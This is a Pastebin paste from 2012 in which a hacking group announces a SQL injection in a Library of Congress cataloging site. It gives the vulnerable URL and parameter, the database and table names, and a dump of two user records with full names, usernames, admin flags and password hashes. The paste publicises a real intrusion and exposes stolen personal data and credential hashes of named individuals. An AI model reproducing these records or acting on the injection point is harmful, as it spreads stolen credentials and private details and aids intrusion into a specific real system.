GSec

Library Of Congress Sql Injection Vulnerability #GSec

Aug 31st, 2012
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Library Of Congress "Cataloging Distribution Service" Sql Injection Vulnerability
  2.  
  3. Codeine | @codeinesec
  4. Greysec | @_GSec
  5.  
  6.  
  7. [#]Injection Point:
  8. http://www.loc.gov/cds/products/product.php?productID=102
  9.  
  10. [#]Database:
  11. BE_CDS
  12.  
  13. [#]Tables:
  14. CDScategory
  15. CDScategory_20110816
  16. CDScategory_20110914
  17. CDSformats
  18. CDSproducts
  19. CDSproducts_20100615
  20. CDSproducts_20100618
  21. CDSproducts_20100914
  22. CDSproducts_copy
  23. CDSupdates
  24. CDSusers
  25. `CDSupdates_20100614-2`
  26.  
  27. [#]Dump BE_CDS.CDSusers
  28. -----------------------------------------------------
  29. -admin: Y
  30. -first_name: Peter
  31. -last_name: Seligman
  32. -password: 4b8373d016f277527198385ba72fda0feb5da015
  33. -user_id: 30
  34. -username: psel
  35. -----------------------------------------------------
  36.  
  37. -----------------------------------------------------
  38. -admin: N
  39. -first_name: Jim
  40. -last_name: Tani
  41. -password: 408f559a6dd2bcce32dda6cf6ba3d5fd9b86dbe1
  42. -user_id: 31
  43. -username: jtani
  44. -----------------------------------------------------
  45.  
  46. #GreySec
Add Comment
Please, Sign In to add comment